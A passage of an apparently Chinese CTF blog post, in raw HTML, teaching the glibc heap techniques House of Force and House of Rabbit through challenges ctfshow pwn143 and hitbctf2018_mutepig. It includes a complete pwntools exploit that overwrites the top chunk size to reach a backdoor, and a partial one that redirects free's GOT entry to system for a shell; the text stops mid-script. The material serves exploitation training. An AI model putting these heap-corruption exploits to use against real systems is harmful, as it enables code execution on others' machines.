class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"House_of_Force\"><\/span>House of Force<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u539f\u7406\u6458\u81eactf wiki\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/heap\/ptmalloc2\/house-of-force\/\">House Of Force &#8211; CTF Wiki<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/T5I2E_CE4RR9QLY-1024x514.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"514\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/T5I2E_CE4RR9QLY-1024x514.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-249\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u68e98816\">\u6211\u7684\u7406\u89e3\u662f\uff0c\u6bcf\u5f53malloc\u65f6\uff0c\u5982\u679cbins\u91cc\u9762\u6ca1\u6709\u5408\u9002\u7684chunk\u5206\u914d\uff0c\u5c31\u4f1a\u4ecetop chunk\u4e2d\u5272\u4e00\u5757\u51fa\u6765\uff0ctop chunk\u7684\u5730\u5740\u4e5f\u4f1a\u76f8\u5e94\u79fb\u52a8\uff0c\u90a3\u5982\u679cmalloc\u4e86\u4e00\u4e2a\u8d1f\u503c\u5462\uff1ftop chunk\u5c31\u4f1a\u5f80\u4f4e\u5730\u5740\u79fb\u52a8\uff0c\u5982\u679c\u8fd9\u4e2a\u8d1f\u503c\u662f\u53ef\u4ee5\u968f\u610f\u5206\u914d\u7684\uff0c\u4e5f\u5c31\u610f\u5473\u7740top chunk\u7684\u5730\u5740\u80fd\u6539\u5230\u4efb\u610f\u5730\u65b9\uff0c\u8fd9\u65f6\u5019\u518d\u7533\u8bf7chunk\uff0c\u5c31\u80fd\u8fbe\u5230\u4efb\u610f\u5730\u5740\u5199\u7684\u6548\u679c<\/p>\n\n\n\n<p>\u4f8b\u9898 ctfshow pwn\u5165\u95e8 pwn143<\/p>\n\n\n\n<p>\u9898\u76ee\u4e00\u5f00\u59cb\u5c31\u81ea\u521b\u4e86\u4e00\u4e2a&#8221;bye_message&#8221; chunk\uff0c\u8fd9\u4e2achunk\u7684\u5185\u5bb9\u662f\u4e2a\u51fd\u6570\u5730\u5740\uff0c\u5728\u7a0b\u5e8f\u7ed3\u675f\u65f6\u5019\u4f1a\u7528\u6765\u6253\u5370goodbye\u8fd9\u4e2a\u5b57\u7b26\u4e32\u3002<\/p>\n\n\n\n<p id=\"u2f9c2674\">edit\u80fd\u6ea2\u51fa<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BKS4Z9W_6@E8@SY19@3T-1024x688.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"688\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BKS4Z9W_6@E8@SY19@3T-1024x688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-250\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uabe3c7b3\">delete\u65e0uaf\u6f0f\u6d1e<\/p>\n\n\n\n<p id=\"u6e8a2d8b\">\u6709\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n<p id=\"u713d7a46\">\u6240\u4ee5\u601d\u8def\u5c31\u662f\uff0c\u5148\u7533\u8bf7\u4e00\u4e2a0x30\u7684chunk\uff0c\u7136\u540eedit\u5b83\uff0c\u6ea2\u51fa\u4fee\u6539top chunk\u7684size\u4f4d\u4e3a-1\uff0c\uff08\u8fd9\u6837\u5c31\u80fd\u9003\u8fc7\u68c0\u67e5\u7533\u8bf7\u4e00\u4e2a\u8d1f\u503c\u7684chunk\uff09\uff0c\u63a5\u7740\u7533\u8bf7\u4e00\u4e2a\u7279\u5b9a\u8d1f\u503c\u7684chunk\uff0c\u4f7f\u5f97top chunk\u7684\u5730\u5740\u79fb\u52a8\u5230bye_message\u8fd9\u4e2achunk\u5904\uff0c\u7533\u8bf7\u4e00\u4e2achunk\uff0c\u4fee\u6539bye_message chunk\u7684\u6307\u9488\u6307\u5411\u540e\u95e8\u51fd\u6570\uff0c\u7136\u540e\u9000\u51fa\u7a0b\u5e8f\u5c31\u80fd\u8c03\u7528\u540e\u95e8\u51fd\u6570:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u7533\u8bf7\u7b2c\u4e00\u4e2achunk\uff0c\u8fd9\u4e2achunk\u548ctop\uff1a\n\nadd(0x30, b'aaaa')\n\n#\u4fee\u6539top chunk\u7684size\u4f4d\u4e3a-1\n\npayload = 0x30 * b'a'\n\npayload += b'a' * 8 + p64(0xffffffffffffffff)\n\nedit(0, 0x41, payload)\n\n#\u8ba1\u7b97top chunk\u5e94\u8be5\u79fb\u52a8\u7684\u5927\u5c0f\uff0c\u8fd9\u91cc\u4e0d\u662f\u5f88\u7406\u89e3\uff0c\u6309\u7406\u6765\u8bf4-0x60\u5c31\u591f\u4e86\uff0c\u4f46\u540e\u9762\u8fd8\u8981\u51cf\u53bb\u4e00\u4e2a\u503c\uff0c\u8fd9\u4e2a\u503c\u7ecf\u8fc7\u6d4b\u8bd5\uff0c\u57280x8-0x17\u4e4b\u95f4\u90fd\u53ef\u4ee5\n\noffset = -0x60-0x17\n\nadd(offset, b'aaaa')\n\n#\u518d\u7533\u8bf7\u4e00\u4e2achunk\uff0c\u62ff\u5230message chunk\u7684\u5185\u5b58\uff0c\u4fee\u6539\u6307\u9488\u5373\u53ef\n\nadd(0x10, p64(flag) * 2)\n\nget_flag()\n\nio.interactive()<\/code><\/pre>\n\n\n\n<p id=\"u5400aa4f\"><\/p>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\ncontext.log_level = \"debug\"\n\nio = remote('pwn.challenge.ctf.show',28182)\n#io= process(\"pwn\")\nelf = ELF('pwn')\ndef add(length,name):\n  io.recvuntil(\"choice:\")\n  io.sendline('2')\n  io.recvuntil(':')\n  io.sendline(str(length))\n  io.recvuntil(\":\")\n  io.sendline(name)\ndef edit(idx,length,name):\n  io.recvuntil(\"choice:\")\n  io.sendline('3')\n  io.recvuntil(\":\")\n  io.sendline(str(idx))\n  io.recvuntil(\":\")\n  io.sendline(str(length))\n  io.recvuntil(':')\n  io.sendline(name)\n\ndef delete(idx):\n  io.revcuntil(\"choice:\")\n  io.sendline(\"4\")\n  io.recvuntil(\":\")\n  io.sendline(str(idx))\n\ndef show():\n  io.recvuntil(\"choice:\")\n  io.sendline(\"1\")\n\nflag = elf.sym&#91;'fffffffffffffffffffffffffffffffffflag']\n#\u7533\u8bf7\u7b2c\u4e00\u4e2achunk\uff0c\u8fd9\u4e2achunk\u548ctop\uff1a\n\nadd(0x30, b'aaaa')\n\n#\u4fee\u6539top chunk\u7684size\u4f4d\u4e3a-1\n\npayload = 0x30 * b'a'\n\npayload += b'a' * 8 + p64(0xffffffffffffffff)\n\nedit(0, 0x41, payload)\n\n#\u8ba1\u7b97top chunk\u5e94\u8be5\u79fb\u52a8\u7684\u5927\u5c0f\uff0c\u8fd9\u91cc\u4e0d\u662f\u5f88\u7406\u89e3\uff0c\u6309\u7406\u6765\u8bf4-0x60\u5c31\u591f\u4e86\uff0c\u4f46\u540e\u9762\u8fd8\u8981\u51cf\u53bb\u4e00\u4e2a\u503c\uff0c\u8fd9\u4e2a\u503c\u7ecf\u8fc7\u6d4b\u8bd5\uff0c\u57280x8-0x17\u4e4b\u95f4\u90fd\u53ef\u4ee5\n\noffset = -0x60-0x17\n\nadd(offset, b'aaaa')\n\n#\u518d\u7533\u8bf7\u4e00\u4e2achunk\uff0c\u62ff\u5230message chunk\u7684\u5185\u5b58\uff0c\u4fee\u6539\u6307\u9488\u5373\u53ef\n\nadd(0x10, p64(flag) * 2)\n\n\nio.recvuntil(\"choice:\")\nio.sendline(\"5\")\n\nio.interactive()\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/ZKKU5PS8F2EC9NVP-1024x382.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"382\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/ZKKU5PS8F2EC9NVP-1024x382.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-546\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"House_of_Rabbit\"><\/span>House of Rabbit<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u53c2\u8003ctf wiki\uff1a<a href=\"https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/heap\/ptmalloc2\/house-of-rabbit\/\">House of Rabbit &#8211; CTF Wiki<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.52pojie.cn\/thread-1881991-1-1.html\">\u5806\u5229\u7528\u8be6\u89e3\uff1athe house of rabbit\uff08\u8d85\u8be6\u7ec6\uff09 &#8211; \u543e\u7231\u7834\u89e3 &#8211; 52pojie.cn<\/a><\/p>\n\n\n\n<p>\u524d\u7f6e\u77e5\u8bc6\uff1a<\/p>\n\n\n\n<p>malloc_consolidate\u51fd\u6570\uff1a<a href=\"https:\/\/kiprey.github.io\/2020\/05\/heap-11-malloc_consolidate\/\">heap &#8211; 11 &#8211; malloc_consolidate \u6e90\u7801\u53ca\u5176\u90e8\u5206\u5206\u6790 | Kiprey&#8217;s Blog<\/a><\/p>\n\n\n\n<p>malloc_consolidate\u89e6\u53d1\u60c5\u666f\uff1a<a href=\"https:\/\/blog.csdn.net\/qq_41453285\/article\/details\/97627411\">\u5806\u6f0f\u6d1e\u6316\u6398\u4e2d\u7684malloc_consolidate\u4e0eFASTBIN_CONSOLIDATION_THRESHOLD_consolidate\u51fd\u6570-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/blog.csdn.net\/A13837377363\/article\/details\/138901673\">malloc_consolidate_malloc consolidate-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u672c\u6f0f\u6d1e\u6838\u5fc3\u5728\u4e8emalloc_consolidate\u51fd\u6570\uff0c\u89e6\u53d1\u8fd9\u4e2a\u51fd\u6570\u65f6\uff0c\u4f1a\u628a\u6bcf\u4e00\u4e2afast bin\u91cc\u9762\u7684chunk\u5c1d\u8bd5\u5411\u524d\u5411\u540e\u5408\u5e76\uff0c\u7136\u540e\u4e22\u5230unsorted bin\u4e2d\u3002<\/p>\n\n\n\n<p>\u5229\u7528\u6b65\u9aa4\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p>1.\u5b58\u5728\u4e00\u4e2afast bin\u91cc\u9762\u7684chunk0<\/p>\n\n\n\n<p>2.\u4fee\u6539\u8be5chunk0\u7684fd\u6307\u9488\uff0c\u6307\u5411\u4e00\u4e2a\u7cbe\u5fc3\u4f2a\u9020\u7684fakechunk\uff08\u80fd\u7ed5\u8fc7\u4e0b\u4e00\u6b65\u7684\u68c0\u6d4b\u4e0d\u89e6\u53d1\u5408\u5e76\uff09<\/p>\n\n\n\n<p>3.\u89e6\u53d1malloc_consolidate\u51fd\u6570\uff0cfakechunk\u5c31\u4f1a\u88ab\u653e\u5230unsorted bin\u4e2d<\/p>\n\n\n\n<p>4.\u518d\u7533\u8bf7\u4e00\u4e2a\u5927\u4e8e0xffff\u7684\u5757\uff0c\u5c31\u4f1a\u628afakechunk\u653e\u5230large bin\u4e2d(\u9700\u8981\u901a\u8fc7\u68c0\u6d4b)\uff0c\u7136\u540e\u518d\u6b21\u4fee\u6539fakechunk\u7684\u5927\u5c0f\u4e3a\u4e00\u4e2a\u975e\u5e38\u5927\u7684\u503c\uff0c\u8fd9\u4e2a\u65f6\u5019\u518dmalloc\u5408\u9002\u7684\u5927\u5c0f\uff0c\u5c31\u80fd\u5207\u5272\u5f97\u5230\u60f3\u8981\u5730\u5740\u7684chunk\uff0c\u76f8\u5f53\u4e8e\u5b9e\u73b0\u4e86\u4efb\u610f\u5730\u5740\u5199\u3002<\/p>\n\n\n\n<p> \u4e00\u4e2a\u5c0f\u95ee\u9898\uff0c\u4e3a\u4ec0\u4e48\u4e0d\u76f4\u63a5\u5728unsorted bin\u91cc\u9762\u5207\u5272\u6765\u4efb\u610f\u5730\u5740\u5199\uff1f\u6211\u7684\u7406\u89e3\u662f\uff1a\u56e0\u4e3aunsorted bin\u5207\u5272\u4ec5\u9650\u4e8esmall bin\u8303\u56f4\u5185\uff0c\u8d85\u8fc7small bin\u8303\u56f4\u4e14\u5927\u5c0f\u4e0d\u662f\u521a\u597d\u547d\u4e2d\u7684chunk\u4e0d\u4f1a\u5207\u5272\uff0c\u800c\u662f\u4f1a\u76f4\u63a5\u653e\u5230large bin\u91cc\u9762\uff0c\u6240\u4ee5\u5f97\u8fdblarge bin\u5207\u5272\u624d\u80fd\u8fbe\u5230\u5927\u8303\u56f4\u7684\u5730\u5740\u5199\u3002<\/p>\n\n\n\n<p>\u53ef\u4ee5\u7ed3\u5408CTFSHOW\u7684demo\u6765\u770b\uff1a<a href=\"https:\/\/xz.aliyun.com\/t\/15152?time__1311=GqjxuQD%3DPmq05DK5YK0%3DIewDmOqvTPW4D#toc-1\">House Of Rabbit\u539f\u7406\u4e0e\u4f8b\u9898 &#8211; \u5148\u77e5\u793e\u533a<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u9898\uff1ahitbctf2018_mutepig<\/p>\n\n\n\n<p>\u53c2\u8003\u6587\u7ae0:<a href=\"https:\/\/a1ex.online\/2020\/10\/15\/House-of-Rabbit%E5%AD%A6%E4%B9%A0\/\">(*\u00b4\u2207\uff40*) \u5929\u4eae\u5566~ House_of_Rabbit\u5b66\u4e60 | A1ex&#8217;s Blog<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.52pojie.cn\/thread-1881991-1-1.html\">\u5806\u5229\u7528\u8be6\u89e3\uff1athe house of rabbit\uff08\u8d85\u8be6\u7ec6\uff09 &#8211; \u543e\u7231\u7834\u89e3 &#8211; 52pojie.cn<\/a><\/p>\n\n\n\n<p>\u6709add\uff0cdelete\u3001edit\u3001system\uff0c\u6ca1\u6709show\u3002\u4e4b\u524d\u6ca1\u6709show\u7684\u60c5\u51b5\u90fd\u662f\u8003\u8651\u901a\u8fc7IO_FILE\u6765\u6cc4\u9732\uff0c\u8fd9\u6b21\u7528house of rabbit\u6253\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/IDZQEJN132P@XZSRP52W0Z-1024x624.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"624\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/IDZQEJN132P@XZSRP52W0Z-1024x624.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-550\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>add\u51fd\u6570\uff0c\u53ef\u4ee5\u7533\u8bf7\u56db\u79cd\u5927\u5c0f\u7684chunk\uff0c\u5176\u4e2d\u6700\u5927\u7684\u4e00\u79cd\u53ea\u6709\u4e00\u6b21\u673a\u4f1a\uff0cchunk\u6307\u9488\u4f1a\u88ab\u5b58\u50a8\u5728ptr\u53d8\u91cf\u4e2d\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/C7U5AO4B@@9JWZSUQB.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"937\" height=\"755\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/C7U5AO4B@@9JWZSUQB.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-551\"  sizes=\"auto, (max-width: 937px) 100vw, 937px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>delete\u51fd\u6570\uff0c\u628a\u5bf9\u5e94\u6307\u9488\u7ed9free\u6389\uff0c\u4f46\u662f\u6ca1\u6709\u7f6e\u7a7a\uff0c\u53ef\u5c1d\u8bd5UAF\u6216\u8005double free\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/JK44N3T0KJ6KJKI0A.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"621\" height=\"267\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/JK44N3T0KJ6KJKI0A.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-552\"  sizes=\"auto, (max-width: 621px) 100vw, 621px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>edit\u51fd\u6570\uff0c\u4e24\u4e2aread_end0\uff08\u81ea\u5df1\u4fee\u6539\u547d\u540d\u7684\uff09\uff0c\u4f1a\u5728\u5b57\u7b26\u4e32\u540e\u9762\u81ea\u52a8\u6dfb\u52a0\\0\uff0c\u7b2c\u4e00\u4e2aread_end0\u53ef\u4ee5\u4fee\u6539\u5bf9\u5e94chunk\u7684\u524d\u516b\u4e2a\u5b57\u8282\uff0c\u7b2c\u4e8c\u4e2aread_end0\u53ef\u4ee5\u4fee\u6539bss\u6bb5\u7684\u90e8\u5206\u533a\u57df\uff0c\u53ef\u4ee5\u7528\u6765\u4f2a\u9020fakechunk\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BN9P8RPLS1WTRRJECB_N.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"342\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BN9P8RPLS1WTRRJECB_N.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-553\"  sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/div><\/figure>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p> \u6240\u4ee5\u5229\u7528house of rabbit\u7684\u601d\u8def\u5c31\u662f\uff1a<\/p>\n\n\n\n<p>1.add\u4e24\u4e2a0xa00000\u5927\u5c0f\u7684chunk0\u3001chunk1\u5e76\u8f6e\u6d41\u91ca\u653e\uff0c\u8fd9\u4e00\u6b65\u64cd\u4f5c\u662f\u4e3a\u4e86\u6269\u5927top chunk\u3002<\/p>\n\n\n\n<p>2.add\u4e00\u4e2afast bin\u5927\u5c0f\u7684chunk2\uff0c\u4e00\u4e2asmall bin\u5927\u5c0f\u7684chunk3\u3002<\/p>\n\n\n\n<p>3.\u628achunk2\u91ca\u653e\u6389\uff0c\u4fee\u6539chunk2\u7684fd\u6307\u9488\uff08\u4e5f\u5c31\u662f\u521a\u597d\u80fd\u6539\u5230\u7684\u524d\u516b\u5b57\u8282\uff09\uff0c\u6307\u5411fakechunk\u4f4d\u7f6e\uff0c\u540c\u65f6\u5728fakechunk\u4f4d\u7f6e\u4f2a\u9020chunk\u3002<\/p>\n\n\n\n<p>4.\u518d\u91ca\u653echunk3\uff0cchunk3\u548ctop chunk\u5408\u5e76\uff0c\u89e6\u53d1malloc consolidation\uff0cchunk2\u4e5f\u88ab\u5408\u5e76\u5165top chunk\uff0c\u4f46\u662ffake chunk\u7531\u4e8e\u7cbe\u5fc3\u6784\u9020\uff0c\u4f1a\u7ed5\u8fc7\u68c0\u6d4b\uff0c\u5355\u72ec\u8fdb\u5165unsorted bin\u3002<\/p>\n\n\n\n<p>5.\u4fee\u6539fake chunk\u7684size\uff0c\u4f7f\u5176\u80fd\u901a\u8fc7\u4e0b\u4e00\u6b65\u7684\u68c0\u6d4b<\/p>\n\n\n\n<p>6.\u518d\u7533\u8bf7\u4e00\u4e2a0xA00000\u7684chunk\uff0cfake chunk\u5c31\u4f1a\u8fdb\u5165large bin\u4e4b\u4e2d\u3002<\/p>\n\n\n\n<p>7.\u4fee\u6539fakechunk\u7684\u5927\u5c0f\u4e3a\u4e00\u4e2a\u7279\u5b9a\u7684\u503c\uff0c\u8fd9\u4e2a\u503c\u4e0e\u4e0b\u4e00\u6b65\u7533\u8bf7\u5927\u5c0f\u7684\u503c\u7684\u5dee\u5c31\u662f\u60f3\u8981\u5730\u5740\u7684\u504f\u79fb<\/p>\n\n\n\n<p>8. \u7533\u8bf70xFFFFFFFFFFFFFF70\uff08\u56e0\u4e3a\u9898\u76ee\u4e2d\u53ea\u80fd\u7533\u8bf7\u8fd9\u4e2a\uff09,  \u6b64\u65f6unsorted bin\u5c31\u4f1a\u6307\u5411\u76ee\u6807\u5730\u5740\uff0c\u5c31\u53ef\u4ee5\u7533\u8bf7\u5230\u4e00\u4e2a\u53ef\u4ee5\u4fee\u6539ptr\u6307\u9488\u6570\u7ec4\u7684chunk\u3002<\/p>\n\n\n\n<p>9.\u4fee\u6539chunk0\u7684\u6307\u9488\u4e3agot\u8868\u4e2dfree\u7684\u5730\u5740<\/p>\n\n\n\n<p>10.\u4fee\u6539free\u4e3asystem\u51fd\u6570\uff0c\u987a\u4fbf\u8f93\u5165\/bin\/sh\uff08\u4e0d\u7528\u88650\uff0c\u56e0\u4e3aread_end0\u6709\u8fd9\u4e2a\u529f\u80fd\uff09<\/p>\n\n\n\n<p>11.free\u6389\/bin\/sh\u7684\u4f4d\u7f6e\u7684chunk\uff0c\u5373\u8c03\u7528\u4e86system(\/bin\/sh),\u62ff\u5230shell<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5176\u4e2d\uff0cfakechunk\u7684\u201c\u7cbe\u5fc3\u6784\u9020\u201d\u548c\u4fee\u6539fakechunk\u7684\u7279\u5b9a\u7684\u503c\u5e94\u8be5\u600e\u4e48\u7b97\uff0c\u53c2\u8003\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/www.52pojie.cn\/thread-1881991-1-1.html\">\u5806\u5229\u7528\u8be6\u89e3\uff1athe house of rabbit\uff08\u8d85\u8be6\u7ec6\uff09 &#8211; \u543e\u7231\u7834\u89e3 &#8211; 52pojie.cn<\/a><\/p>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\ncontext.update(arch='amd64',os='linux',log_level = 'debug')\n\np= process('\/home\/monke\/PWN\/hous_ of_rabbit\/mutepig')\nelf = ELF('\/home\/monke\/PWN\/hous_ of_rabbit\/mutepig')\nlibc = ELF('\/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_amd64\/libc-2.23.so')\n\n\ndef add(type,content):\n\tp.sendline('1')\n\tp.sendline(str(type))\n\tp.send(content)\n\t\n\t\ndef free(index):\n\tp.sendline('2')\n\tp.sendline(str(index))\n\ndef edit(index,content1,content2):\n\tp.sendline('3')\n\tp.sendline(str(index))\n\tp.send(content1)\n\tp.send(content2)\n\t\nptr = 0x06020C0\nbss= 0x602120\n#1.add\u4e24\u4e2a0xa00000\u5927\u5c0f\u7684chunk0\u3001chunk1\u5e76\u8f6e\u6d41\u91ca\u653e\uff0c\u8fd9\u4e00\u6b65\u64cd\u4f5c\u662f\u4e3a\u4e86\u6269\u5927top chunk\nadd(3,'0') #0\nfree(0)\nadd(3,'1') #1\nfree(1)\n\n#2.add\u4e00\u4e2afast bin\u5927\u5c0f\u7684chunk2\uff0c\u4e00\u4e2asmall bin\u5927\u5c0f\u7684chunk3\u3002\nadd(1,'2') #2\nadd(2,'3') 